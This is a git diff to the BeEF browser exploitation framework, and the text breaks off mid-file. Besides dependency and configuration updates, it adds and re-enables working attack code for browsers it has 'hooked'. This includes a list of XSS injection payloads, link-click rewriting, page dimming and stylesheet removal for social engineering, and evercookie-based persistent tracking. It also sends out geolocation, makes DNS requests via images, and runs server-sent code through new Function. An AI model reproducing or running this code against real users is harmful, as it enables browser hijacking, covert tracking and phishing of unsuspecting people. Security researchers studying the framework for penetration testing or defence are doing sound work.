Add support for Firefox 25

Module Update: lcamtuf Download

.gitignore

@@ -3,3 +3,6 @@ test/msf-test
 custom-config.yaml
 .DS_Store
 .gitignore
+.rvmrc
+
+*.lock

Gemfile

@@ -9,15 +9,18 @@
 # Gems only required on Windows, or with specific Windows issues
 if RUBY_PLATFORM.downcase.include?("mswin") || RUBY_PLATFORM.downcase.include?("mingw")
   gem "win32console"
-  gem "eventmachine", "1.0.0.beta.4.1"
-else
-  gem "eventmachine", "0.12.10"
 end
 
+gem "eventmachine", "1.0.3"
 gem "thin"
-gem "sinatra", "1.3.2"
+gem "sinatra", "1.4.2"
+gem "rack", "1.5.2"
 gem "em-websocket", "~> 0.3.6"
-gem "jsmin", "~> 1.0.1"
+gem "uglifier", "~> 2.2.1"
+# install https://github.com/cowboyd/therubyracer if the OS is != than OSX
+if !RUBY_PLATFORM.downcase.include?("darwin")
+  gem "therubyracer", "~> 0.12.0"
+end
 gem "ansi"
 gem "term-ansicolor", :require => "term/ansicolor"
 gem "dm-core"
@@ -28,6 +31,7 @@ gem "parseconfig"
 gem "erubis"
 gem "dm-migrations"
 gem "msfrpc-client"
+gem "rubyzip", "~> 1.0.0"
 
 # notifications
 gem "twitter"

README.mkd

@@ -72,3 +72,6 @@ To get started, simply execute beef and follow the instructions:
 
        $ ./beef
 
+On windows use
+
+      $ ruby beef

Rakefile

@@ -76,10 +76,10 @@ end
 @beef_process_id = nil;
 
 task :beef_start => 'beef' do
-  printf "Starting BeEF (wait 10 seconds)..."
+  printf "Starting BeEF (wait a few seconds)..."
   @beef_process_id = IO.popen("ruby ./beef -x 2> /dev/null", "w+")
-  delays = [2, 2, 1, 1, 1, 0.5, 0.5 , 0.5, 0.3, 0.2, 0.1, 0.1, 0.1, 0.05, 0.05]
-  delays.each do |i| # delay for 10 seconds
+  delays = [3, 2, 2, 2, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
+  delays.each do |i| # delay for a few seconds
     printf '.'
     sleep (i)
   end

VERSION

@@ -4,4 +4,4 @@
 # See the file 'doc/COPYING' for copying permission
 #
 
-0.4.4.2.1-alpha
+0.4.4.8-alpha

beef

@@ -75,6 +75,7 @@ case config.get("beef.database.driver")
     DataMapper.setup(:default,
                      :adapter => config.get("beef.database.driver"),
                      :host => config.get("beef.database.db_host"),
+                     :port => config.get("beef.database.db_port"),
                      :username => config.get("beef.database.db_user"),
                      :password => config.get("beef.database.db_passwd"),
                      :database => config.get("beef.database.db_name"),

config.yaml

@@ -6,7 +6,7 @@
 # BeEF Configuration file
 
 beef:
-    version: '0.4.4.2.1-alpha'
+    version: '0.4.4.8-alpha'
     debug: false
 
     restrictions:
@@ -27,30 +27,38 @@ beef:
         # if running behind a nat set the public ip address here
         #public: ""
         #public_port: "" # port setting is experimental
-        dns: "localhost"
-        panel_path: "/ui/panel"
+        # DNS
+        dns_host: "localhost"
+        dns_port: 53
+        web_ui_basepath: "/ui"
         hook_file: "/hook.js"
         hook_session_name: "BEEFHOOK"
         session_cookie_name: "BEEFSESSION"
 
+        # Allow one or multiple domains to access the RESTful API using CORS
+        # For multiple domains use: "http://browserhacker.com, http://domain2.com"
+        restful_api:
+            allow_cors: false
+            cors_allowed_domains: "http://browserhacker.com"
+
         # Prefer WebSockets over XHR-polling when possible.
         websocket:
           enable: false
-          secure: true # use WebSocketSecure work only on https domain and whit https support enabled in BeEF
+          secure: true # use 'WebSocketSecure' works only on HTTPS domains and with HTTPS support enabled in BeEF
           port: 61985 # WS: good success rate through proxies
           secure_port: 61986 # WSSecure
           ws_poll_timeout: 1000 # poll BeEF every second
 
         # Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
         web_server_imitation:
-            enable: false
+            enable: true
             type: "apache" #supported: apache, iis
 
         # Experimental HTTPS support for the hook / admin / all other Thin managed web services
         https:
             enable: false
             # In production environments, be sure to use a valid certificate signed for the value
-            # used in beef.http.dns (the domain name of the server where you run BeEF)
+            # used in beef.http.dns_host (the domain name of the server where you run BeEF)
             key: "beef_key.pem"
             cert: "beef_cert.pem"
 
@@ -72,6 +80,7 @@ beef:
 
         # db connection information is only used for mysql/postgres
         db_host: "localhost"
+        db_port: 5432
         db_name: "beef"
         db_user: "beef"
         db_passwd: "beef123"
@@ -91,6 +100,10 @@ beef:
 
     crypto_default_value_length: 80
 
+    # Enable client-side debugging
+    client:
+        debug: false
+
     # You may override default extension configuration parameters here
     extension:
         requester:

core/bootstrap.rb

@@ -45,6 +45,7 @@ require 'core/main/rest/handlers/modules'
 require 'core/main/rest/handlers/categories'
 require 'core/main/rest/handlers/logs'
 require 'core/main/rest/handlers/admin'
+require 'core/main/rest/handlers/server'
 require 'core/main/rest/api'
 
 ## @note Include Websocket

core/core.rb

@@ -37,4 +37,7 @@ require 'core/main/migration'
 require 'core/main/console/commandline'
 require 'core/main/console/banners'
 
+# @note Include rubyzip lib
+require 'zip'
+
 

core/filters/browser.rb

@@ -22,7 +22,7 @@ module Filters
   def self.is_valid_browsertype?(str)
     return false if not is_non_empty_string?(str)
     return false if str.length < 10
-    return false if str.length > 50
+    return false if str.length > 250
     return false if has_non_printable_char?(str)
     true
   end
@@ -123,9 +123,9 @@ module Filters
     return true if not is_non_empty_string?(str)
     return false if str.length > 1000
     if RUBY_VERSION >= "1.9" && str.encoding === Encoding.find('UTF-8')
-      return (str =~ /[^\w\d\s()-.,;_!\302\256]/u).nil?
+      return (str =~ /[^\w\d\s()-.,';_!\302\256]/u).nil?
     else
-      return (str =~ /[^\w\d\s()-.,;_!\302\256]/n).nil?
+      return (str =~ /[^\w\d\s()-.,';_!\302\256]/n).nil?
     end
   end
 

core/main/client/beef.js

@@ -31,7 +31,21 @@ if(typeof beef === 'undefined' && typeof window.beef === 'undefined') {
 		
 		// An array containing all the BeEF JS components.
 		components: new Array(),
-		
+
+                /**
+                 * Adds a function to display debug messages (wraps console.log())
+                 * @param: {string} the debug string to return
+                 */
+                debug: function(msg) {
+                    if (!<%= @client_debug %>) return;
+                    if (typeof console == "object" && typeof console.log == "function") {
+                        console.log(msg);
+                    } else {
+                        // TODO: maybe add a callback to BeEF server for debugging purposes
+                        //window.alert(msg);
+                    }
+                },
+
 		/**
 		 * Adds a function to execute.
 		 * @param: {Function} the function to execute.

core/main/client/dom.js

@@ -76,6 +76,30 @@ beef.dom = {
 		
 		return iframe;
 	},
+
+	/**
+	 * Returns the highest current z-index
+	 * @param: {Boolean} whether to return an associative array with the height AND the ID of the element
+	 * @return: {Integer} Highest z-index in the DOM
+	 * OR
+	 * @return: {Hash} A hash with the height and the ID of the highest element in the DOM {'height': INT, 'elem': STRING}
+	 */
+	getHighestZindex: function(include_id) {
+		var highest = {'height':0, 'elem':''};
+		$j('*').each(function() {
+			var current_high = parseInt($j(this).css("zIndex"),10);
+			if (current_high > highest.height) {
+				highest.height = current_high;
+				highest.elem = $j(this).attr('id');
+			}
+		});
+
+		if (include_id) {
+			return highest;
+		} else {
+			return highest.height;
+		}
+	},
 	
 	/**
      * Create and iFrame element. In case it's create with POST method, the iFrame is automatically added to the DOM and submitted.
@@ -95,8 +119,15 @@ beef.dom = {
 			var form_action = params['src'];
 			params['src'] = '';
 		}
-		if (type == 'hidden') { css = $j.extend(true, {'border':'none', 'width':'1px', 'height':'1px', 'display':'none', 'visibility':'hidden'}, styles); }
-		if (type == 'fullscreen') { css = $j.extend(true, {'border':'none', 'background-color':'white', 'width':'100%', 'height':'100%', 'position':'absolute', 'top':'0px', 'left':'0px'}, styles); $j('body').css({'padding':'0px', 'margin':'0px'}); }
+		if (type == 'hidden') {
+			css = $j.extend(true, {'border':'none', 'width':'1px', 'height':'1px', 'display':'none', 'visibility':'hidden'}, styles);
+		} else if (type == 'fullscreen') {
+			css = $j.extend(true, {'border':'none', 'background-color':'white', 'width':'100%', 'height':'100%', 'position':'absolute', 'top':'0px', 'left':'0px', 'z-index':beef.dom.getHighestZindex()+1}, styles);
+			$j('body').css({'padding':'0px', 'margin':'0px'});
+		} else {
+			css = styles;
+			$j('body').css({'padding':'0px', 'margin':'0px'});
+		}
 		var iframe = $j('<iframe />').attr(params).css(css).load(onload).prependTo('body');
 		
 		if (form_submit && form_action)
@@ -127,6 +158,75 @@ beef.dom = {
             }
         });
     },
+
+    /**
+     * Load a full screen div that is black, or, transparent
+     * @param: {Boolean} vis: whether or not you want the screen dimmer enabled or not
+     * @param: {Hash} options: a collection of options to customise how the div is configured, as follows:
+     *         opacity:0-100         // Lower number = less grayout higher = more of a blackout
+     *           // By default this is 70 
+     *         zindex: #             // HTML elements with a higher zindex appear on top of the gray out
+     *           // By default this will use beef.dom.getHighestZindex to always go to the top
+     *         bgcolor: (#xxxxxx)    // Standard RGB Hex color code
+     *           // By default this is #000000
+     */
+	grayOut: function(vis, options) {
+	  // in any order.  Pass only the properties you need to set.
+	  var options = options || {};
+	  var zindex = options.zindex || beef.dom.getHighestZindex()+1;
+	  var opacity = options.opacity || 70;
+	  var opaque = (opacity / 100);
+	  var bgcolor = options.bgcolor || '#000000';
+	  var dark=document.getElementById('darkenScreenObject');
+	  if (!dark) {
+	    // The dark layer doesn't exist, it's never been created.  So we'll
+	    // create it here and apply some basic styles.
+	    // If you are getting errors in IE see: http://support.microsoft.com/default.aspx/kb/927917
+	    var tbody = document.getElementsByTagName("body")[0];
+	    var tnode = document.createElement('div');           // Create the layer.
+	        tnode.style.position='absolute';                 // Position absolutely
+	        tnode.style.top='0px';                           // In the top
+	        tnode.style.left='0px';                          // Left corner of the page
+	        tnode.style.overflow='hidden';                   // Try to avoid making scroll bars            
+	        tnode.style.display='none';                      // Start out Hidden
+	        tnode.id='darkenScreenObject';                   // Name it so we can find it later
+	    tbody.appendChild(tnode);                            // Add it to the web page
+	    dark=document.getElementById('darkenScreenObject');  // Get the object.
+	  }
+	  if (vis) {
+	    // Calculate the page width and height 
+	    if( document.body && ( document.body.scrollWidth || document.body.scrollHeight ) ) {
+	        var pageWidth = document.body.scrollWidth+'px';
+	        var pageHeight = document.body.scrollHeight+'px';
+	    } else if( document.body.offsetWidth ) {
+	      var pageWidth = document.body.offsetWidth+'px';
+	      var pageHeight = document.body.offsetHeight+'px';
+	    } else {
+	       var pageWidth='100%';
+	       var pageHeight='100%';
+	    }
+	    //set the shader to cover the entire page and make it visible.
+	    dark.style.opacity=opaque;
+	    dark.style.MozOpacity=opaque;
+	    dark.style.filter='alpha(opacity='+opacity+')';
+	    dark.style.zIndex=zindex;
+	    dark.style.backgroundColor=bgcolor;
+	    dark.style.width= pageWidth;
+	    dark.style.height= pageHeight;
+	    dark.style.display='block';
+	  } else {
+	     dark.style.display='none';
+	  }
+	},
+
+	/**
+	 * Remove all external and internal stylesheets from the current page - sometimes prior to socially engineering,
+	 *  or, re-writing a document this is useful.
+	 */
+	removeStylesheets: function() {
+		$j('link[rel=stylesheet]').remove();
+		$j('style').remove();
+	},
 	
 	/**
      * Create a form element with the specified parameters, appending it to the DOM if append == true
@@ -178,6 +278,23 @@ beef.dom = {
 		}).length;
 	},
 
+	/**
+	 * Rewrites all links matched by selector to url, leveraging Bilawal Hameed's hidden click event overwriting.
+	 * http://bilaw.al/2013/03/17/hacking-the-a-tag-in-100-characters.html
+	 * @param: {String} url: the url to be rewritten
+	 * @param: {String} selector: the jquery selector statement to use, defaults to all a tags.
+	 * @return: {Number} the amount of links found in the DOM and rewritten.
+	 */
+	rewriteLinksClickEvents: function(url, selector) {
+		var sel = (selector == null) ? 'a' : selector;
+		return $j(sel).each(function() {
+			if ($j(this).attr('href') != null)
+			{
+				$j(this).click(function() {this.href=url});
+			}
+		}).length;
+	},
+
 	/**
      * Parse all links in the page matched by the selector, replacing old_protocol with new_protocol (ex.:https with http)
 	 * @param: {String} old_protocol: the old link protocol to be rewritten
@@ -267,7 +384,8 @@ beef.dom = {
 
             if (codebase != null) {
                 content += "<param name='codebase' value='" + codebase + "' />"
-            }else{
+            }
+            if (archive != null){
                 content += "<param name='archive' value='" + archive + "' />";
             }
             if (params != null) {
@@ -275,7 +393,7 @@ beef.dom = {
             }
             content += "</object>";
         }
-        if (beef.browser.isC() || beef.browser.isS() || beef.browser.isO()) {
+        if (beef.browser.isC() || beef.browser.isS() || beef.browser.isO() || beef.browser.isFF()) {
 
             if (codebase != null) {
                 content = "" +
@@ -294,24 +412,25 @@ beef.dom = {
             }
             content += "</applet>";
         }
-        if (beef.browser.isFF()) {
-            if (codebase != null) {
-                content = "" +
-                    "<embed id='" + id + "' code='" + code + "' " +
-                    "type='application/x-java-applet' codebase='" + codebase + "' " +
-                    "height='0' width='0' name='" + name + "'>";
-            } else {
-                content = "" +
-                    "<embed id='" + id + "' code='" + code + "' " +
-                    "type='application/x-java-applet' archive='" + archive + "' " +
-                    "height='0' width='0' name='" + name + "'>";
-            }
-
-            if (params != null) {
-                content += beef.dom.parseAppletParams(params);
-            }
-            content += "</embed>";
-        }
+        // For some reasons JavaPaylod is not working if the applet is attached to the DOM with the embed tag rather than the applet tag.
+//        if (beef.browser.isFF()) {
+//            if (codebase != null) {
+//                content = "" +
+//                    "<embed id='" + id + "' code='" + code + "' " +
+//                    "type='application/x-java-applet' codebase='" + codebase + "' " +
+//                    "height='0' width='0' name='" + name + "'>";
+//            } else {
+//                content = "" +
+//                    "<embed id='" + id + "' code='" + code + "' " +
+//                    "type='application/x-java-applet' archive='" + archive + "' " +
+//                    "height='0' width='0' name='" + name + "'>";
+//            }
+//
+//            if (params != null) {
+//                content += beef.dom.parseAppletParams(params);
+//            }
+//            content += "</embed>";
+//        }
         $j('body').append(content);
     },
 
@@ -358,11 +477,11 @@ beef.dom = {
      * @params: {String} rport: remote port
      * @params: {String} commands: protocol commands to be executed by the remote host:port service
      */
-    createIframeIpecForm: function(rhost, rport, commands){
+    createIframeIpecForm: function(rhost, rport, path, commands){
         var iframeIpec = beef.dom.createInvisibleIframe();
 
         var formIpec = document.createElement('form');
-        formIpec.setAttribute('action',  'http://'+rhost+':'+rport+'/index.html');
+        formIpec.setAttribute('action',  'http://'+rhost+':'+rport+path);
         formIpec.setAttribute('method',  'POST');
         formIpec.setAttribute('enctype', 'multipart/form-data');
 

core/main/client/geolocation.js

@@ -32,14 +32,14 @@ beef.geolocation = {
 
         $j.ajax({
             error: function(xhr, status, error){
-                //console.log("[geolocation.js] openstreetmap error");
+                beef.debug("[geolocation.js] openstreetmap error");
                 beef.net.send(command_url, command_id, "latitude=" + latitude
                              + "&longitude=" + longitude
                              + "&osm=UNAVAILABLE"
                              + "&geoLocEnabled=True");
                 },
             success: function(data, status, xhr){
-                //console.log("[geolocation.js] openstreetmap success");
+                beef.debug("[geolocation.js] openstreetmap success");
                 var jsonResp = $j.parseJSON(data);
 
                 beef.net.send(command_url, command_id, "latitude=" + latitude
@@ -64,16 +64,16 @@ beef.geolocation = {
 	        beef.net.send(command_url, command_id, "latitude=NOT_ENABLED&longitude=NOT_ENABLED&geoLocEnabled=False");	
 			return;
 		}
-        //console.log("[geolocation.js] navigator.geolocation.getCurrentPosition");
+        beef.debug("[geolocation.js] navigator.geolocation.getCurrentPosition");
         navigator.geolocation.getCurrentPosition( //note: this is an async call
 			function(position){ // success
 				var latitude = position.coords.latitude;
         		var longitude = position.coords.longitude;
-                //console.log("[geolocation.js] success getting position. latitude [%d], longitude [%d]", latitude, longitude);
+                beef.debug("[geolocation.js] success getting position. latitude [%d], longitude [%d]", latitude, longitude);
                 beef.geolocation.getOpenStreetMapAddress(command_url, command_id, latitude, longitude);
 
 			}, function(error){ // failure
-                    //console.log("[geolocation.js] error [%d] getting position", error.code);
+                    beef.debug("[geolocation.js] error [%d] getting position", error.code);
 					switch(error.code) // Returns 0-3
 					{
 						case 0:

core/main/client/hardware.js

@@ -126,4 +126,4 @@ beef.hardware = {
 	}
 };
 
-beef.regCmp('beef.net.hardware');
+beef.regCmp('beef.hardware');

core/main/client/init.js

@@ -13,7 +13,8 @@
  * and will have a new session id. The new session id will need to know
  * the brwoser details. So sendback the browser details again.
  */
-BEEFHOOK = beef.session.get_hook_session_id();
+
+beef.session.get_hook_session_id();
 
 if (beef.pageIsLoaded) {
     beef.net.browser_details();
@@ -31,7 +32,7 @@ window.onpopstate = function (event) {
             try {
                 callback(event);
             } catch (e) {
-                console.log("window.onpopstate - couldn't execute callback: " + e.message);
+                beef.debug("window.onpopstate - couldn't execute callback: " + e.message);
             }
             return false;
         }
@@ -46,7 +47,7 @@ window.onclose = function (event) {
             try {
                 callback(event);
             } catch (e) {
-                console.log("window.onclose - couldn't execute callback: " + e.message);
+                beef.debug("window.onclose - couldn't execute callback: " + e.message);
             }
             return false;
         }

core/main/client/logger.js

@@ -50,6 +50,7 @@ beef.logger = {
 	 */
 	start: function() {
 
+		beef.browser.hookChildFrames();
 		this.running = true;
 		var d = new Date();
 		this.time = d.getTime();

core/main/client/net/dns.js

@@ -43,7 +43,7 @@ beef.net.dns = {
 
 		// sends a DNS request
 		sendQuery = function(query) {
-			//console.log("Requesting: "+query);
+			beef.debug("Requesting: "+query);
 			var img = new Image;
 			img.src = "http://"+query;
 			img.onload = function() { dom.removeChild(this); }

core/main/client/net/xssrays.js

@@ -49,22 +49,20 @@ beef.net.xssrays = {
     //browser-specific attack vectors available strings: ALL, FF, IE, S, C, O
     vectors: [
 
-//				  {input:"',XSS,'", name: 'Standard DOM based injection single quote', browser: 'ALL',url:true,form:true,path:true},
+				  {input:"\',XSS,\'", name: 'Standard DOM based injection single quote', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'",XSS,"', name: 'Standard DOM based injection double quote', browser: 'ALL',url:true,form:true,path:true},
-//				  {input:'\'><script>XSS<\/script>', name: 'Standard script injection single quote', browser: 'ALL',url:true,form:true,path:true},
-				  {input:'"><script>XSS<\/script>', name: 'Standard script injection double quote', browser: 'ALL',url:true,form:true,path:true}, //,
-//				  {input:'\'><body onload=\'XSS\'>', name: 'body onload single quote', browser: 'ALL',url:true,form:true,path:true},
-				  {input:'"><body onload="XSS">', name: 'body onload double quote', browser: 'ALL',url:true,form:true,path:true},
+				  {input:'\'"><script>XSS<\/script>', name: 'Standard script injection', browser: 'ALL',url:true,form:true,path:true},
+				  {input:'\'"><body onload="XSS">', name: 'body onload', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'%27%3E%3C%73%63%72%69%70%74%3EXSS%3C%2F%73%63%72%69%70%74%3E', name: 'url encoded single quote', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'%22%3E%3C%73%63%72%69%70%74%3EXSS%3C%2F%73%63%72%69%70%74%3E', name: 'url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'%25%32%37%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45XSS%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45', name: 'double url encoded single quote', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'%25%32%32%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45XSS%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45', name: 'double url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'%%32%35%%33%32%%33%32%%32%35%%33%33%%34%35%%32%35%%33%33%%34%33%%32%35%%33%37%%33%33%%32%35%%33%36%%33%33%%32%35%%33%37%%33%32%%32%35%%33%36%%33%39%%32%35%%33%37%%33%30%%32%35%%33%37%%33%34%%32%35%%33%33%%34%35XSS%%32%35%%33%33%%34%33%%32%35%%33%32%%34%36%%32%35%%33%37%%33%33%%32%35%%33%36%%33%33%%32%35%%33%37%%33%32%%32%35%%33%36%%33%39%%32%35%%33%37%%33%30%%32%35%%33%37%%33%34%%32%35%%33%33%%34%35', name: 'double nibble url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
-//				  {input:"' style=abc:expression(XSS) ' \" style=abc:expression(XSS) \"", name: 'Expression CSS based injection', browser: 'IE',url:true,form:true,path:true}
-//				  {input:'" type=image src=null onerror=XSS " \' type=image src=null onerror=XSS \'', name: 'Image input overwrite based injection', browser: 'ALL',url:true,form:true,path:true},
-//				  {input:"' onload='XSS' \" onload=\"XSS\"/onload=\"XSS\"/onload='XSS'/", name: 'onload event injection', browser: 'ALL',url:true,form:true,path:true},
-//				  {input:'\'\"<\/script><\/xml><\/title><\/textarea><\/noscript><\/style><\/listing><\/xmp><\/pre><img src=null onerror=XSS>', name: 'Image injection HTML breaker', browser: 'ALL',url:true,form:true,path:true},
-//				  {input:"'},XSS,function x(){//", name: 'DOM based function breaker single quote', browser: 'ALL',url:true,form:true,path:true},
+				  {input:"' style=abc:expression(XSS) ' \" style=abc:expression(XSS) \"", name: 'Expression CSS based injection', browser: 'IE',url:true,form:true,path:true},
+				  {input:'" type=image src=null onerror=XSS " \' type=image src=null onerror=XSS \'', name: 'Image input overwrite based injection', browser: 'ALL',url:true,form:true,path:true},
+				  {input:"' onload='XSS' \" onload=\"XSS\"/onload=\"XSS\"/onload='XSS'/", name: 'onload event injection', browser: 'ALL',url:true,form:true,path:true},
+				  {input:'\'\"<\/script><\/xml><\/title><\/textarea><\/noscript><\/style><\/listing><\/xmp><\/pre><img src=null onerror=XSS>', name: 'Image injection HTML breaker', browser: 'ALL',url:true,form:true,path:true},
+				  {input:"'},XSS,function x(){//", name: 'DOM based function breaker single quote', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'"},XSS,function x(){//', name: 'DOM based function breaker double quote', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'\\x3c\\x73\\x63\\x72\\x69\\x70\\x74\\x3eXSS\\x3c\\x2f\\x73\\x63\\x72\\x69\\x70\\x74\\x3e', name: 'DOM based innerHTML injection', browser: 'ALL',url:true,form:true,path:true},
   				  {input:'javascript:XSS', name: 'Javascript protocol injection', browser: 'ALL',url:true,form:true,path:true},
@@ -107,7 +105,7 @@ beef.net.xssrays = {
     // util function. Print string to the console only if the debug flag is on and the browser is not IE.
     printDebug:function(log) {
         if (this.debug && (!beef.browser.isIE6() && !beef.browser.isIE7() && !beef.browser.isIE8())) {
-            console.log("[XssRays] " + log);
+            beef.debug("[XssRays] " + log);
         }
     },
 
@@ -340,8 +338,8 @@ beef.net.xssrays = {
                         beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.poc = pocurl;
                         beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method;
 
-                        beefCallback = "document.location.href='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
-                            + "&action=ray" + "&p=" + ray.vector.poc + "&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
+                        beefCallback = "location='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
+                            + "&action=ray" + "&p='+window.location.href+'&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
 
                         exploit = vector.input.replace(/XSS/g, beefCallback);
 
@@ -368,7 +366,7 @@ beef.net.xssrays = {
                 beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method;
 
                 beefCallback = "document.location.href='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
-                    + "&action=ray" + "&p=" + ray.vector.poc + "&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
+                    + "&action=ray" + "&p='+window.location.href+'&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
 
                 exploit = vector.input.replace(/XSS/g, beefCallback);
 
@@ -424,7 +422,7 @@ beef.net.xssrays = {
                         beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method;
 
                         beefCallback = "document.location.href='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
-                            + "&action=ray" + "&p=" + ray.vector.poc + "&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
+                            + "&action=ray" + "&p='+window.location.href+'&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
 
                         exploit = beef.net.xssrays.escape(vector.input.replace(/XSS/g, beefCallback));
                         form += '<textarea name="' + i + '">' + exploit + '<\/textarea>';

core/main/client/session.js

@@ -13,7 +13,8 @@ beef.session = {
 	
 	hook_session_id_length: 80,
 	hook_session_id_chars: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789",	
-	ec: new evercookie(),	
+	ec: new evercookie(),
+    beefhook: "<%= @hook_session_name %>",
 	
 	/**
 	 * Gets a string which will be used to identify the hooked browser session
@@ -22,12 +23,12 @@ beef.session = {
 	 */
   	get_hook_session_id: function() {
 		// check if the browser is already known to the framework
-		var id = this.ec.evercookie_cookie("BEEFHOOK");
+		var id = this.ec.evercookie_cookie(beef.session.beefhook);
 		if (typeof id == 'undefined') {
-			var id = this.ec.evercookie_userdata("BEEFHOOK");
+			var id = this.ec.evercookie_userdata(beef.session.beefhook);
 		}
 		if (typeof id == 'undefined') {
-			var id = this.ec.evercookie_window("BEEFHOOK");
+			var id = this.ec.evercookie_window(beef.session.beefhook);
 		}
 		
 		// if the browser is not known create a hook session id and set it
@@ -47,9 +48,9 @@ beef.session = {
 	 */
   	set_hook_session_id: function(id) {
 		// persist the hook session id
-		this.ec.evercookie_cookie("BEEFHOOK", id);
-		this.ec.evercookie_userdata("BEEFHOOK", id);
-		this.ec.evercookie_window("BEEFHOOK", id);
+		this.ec.evercookie_cookie(beef.session.beefhook, id);
+		this.ec.evercookie_userdata(beef.session.beefhook, id);
+		this.ec.evercookie_window(beef.session.beefhook, id);
 	},
 	
 	/**

core/main/client/updater.js

@@ -15,6 +15,7 @@ beef.updater = {
 	
 	// XHR-polling timeout.
     xhr_poll_timeout: "<%= @xhr_poll_timeout %>",
+    beefhook: "<%= @hook_session_name %>",
 	
 	// A lock.
 	lock: false,
@@ -57,7 +58,7 @@ beef.updater = {
 	get_commands: function() {
 		try {
 			this.lock = true;
-            beef.net.request(beef.net.httpproto, 'GET', beef.net.host, beef.net.port, beef.net.hook, null, 'BEEFHOOK='+beef.session.get_hook_session_id(), 5, 'script', function(response) {
+            beef.net.request(beef.net.httpproto, 'GET', beef.net.host, beef.net.port, beef.net.hook, null, beef.updater.beefhook+'='+beef.session.get_hook_session_id(), 5, 'script', function(response) {
                 if (response.body != null && response.body.length > 0)
                     beef.updater.execute_commands();
             });

core/main/client/websocket.js

@@ -53,9 +53,10 @@ beef.websocket = {
         };
 
         this.socket.onmessage = function (message) {
-            //todo: double-check if there is a way to don't use eval here. It's not a big deal,
-            //todo: because the eval'ed data comes from BeEF itself, so is implicitly trusted.
-            eval(message.data);
+            // Data coming from the WebSocket channel is either of String, Blob or ArrayBufferdata type.
+            // That's why it needs to be evaluated first. Using Function is a bit better than pure eval().
+            // It's not a big deal anyway, because the eval'ed data comes from BeEF itself, so it is implicitly trusted.
+            new Function(message.data)();
         };
 
         this.socket.onclose = function () {

core/main/console/banners.rb

@@ -86,7 +86,7 @@ module Banners
         print_success "running on network interface: #{host}"
         beef_host = configuration.get("beef.http.public_port") || configuration.get("beef.http.port")
         data = "Hook URL: #{prototxt}://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.hook_file")}\n"
-        data += "UI URL:   #{prototxt}://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.panel_path")}\n"
+        data += "UI URL:   #{prototxt}://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.web_ui_basepath")}/panel\n"
         
         print_more data
       end

core/main/constants/hardware.rb

@@ -34,8 +34,8 @@ module Constants
 	HW_HTC_IMG            = 'htc.ico'
 	HW_MOTOROLA_UA_STR    = 'motorola'
 	HW_MOTOROLA_IMG       = 'motorola.png'
-	HW_GOOGLE_UA_STR      = 'Nexus One'
-	HE_GOOGLE_IM          = 'nexus.png'
+	HW_GOOGLE_UA_STR      = 'Nexus'
+	HW_GOOGLE_IMG         = 'nexus.png'
 	HW_ERICSSON_UA_STR    = 'Ericsson'
 	HW_ERICSSON_IMG       = 'sony_ericsson.png'
 	HW_ALL_UA_STR         = 'All'

core/main/handlers/browserdetails.rb

@@ -68,6 +68,7 @@ module BeEF
                       }
           zombie.httpheaders = @http_headers.to_json
           zombie.save
+          #puts "HTTP Headers: #{zombie.httpheaders}"
 
           # add a log entry for the newly hooked browser
           BeEF::Core::Logger.instance.register('Zombie', "#{zombie.ip} just joined the horde from the domain: #{log_zombie_domain}:#{log_zombie_port.to_s}", "#{zombie.id}")
@@ -79,6 +80,56 @@ module BeEF
             self.err_msg "Invalid browser name returned from the hook browser's initial connection."
           end
 
+          # detect browser proxy
+          using_proxy = false
+          [
+            'CLIENT_IP',
+            'FORWARDED_FOR',
+            'FORWARDED',
+            'FORWARDED_FOR_IP',
+            'PROXY_CONNECTION',
+            'PROXY_AUTHENTICATE',
+            'X_FORWARDED',
+            'X_FORWARDED_FOR',
+            'VIA'
+          ].each do |header|
+            unless JSON.parse(zombie.httpheaders)[header].nil?
+              using_proxy = true
+              break
+            end
+          end
+
+          # retrieve proxy client IP
+          proxy_clients = []
+          [
+            'CLIENT_IP',
+            'FORWARDED_FOR',
+            'FORWARDED',
+            'FORWARDED_FOR_IP',
+            'X_FORWARDED',
+            'X_FORWARDED_FOR'
+          ].each do |header|
+            proxy_clients << "#{JSON.parse(zombie.httpheaders)[header]}" unless JSON.parse(zombie.httpheaders)[header].nil?
+          end
+
+          # retrieve proxy server
+          proxy_server = JSON.parse(zombie.httpheaders)['VIA'] unless JSON.parse(zombie.httpheaders)['VIA'].nil?
+
+          # store and log proxy details
+          if using_proxy == true
+            BD.set(session_id, 'UsingProxy', "#{using_proxy}")
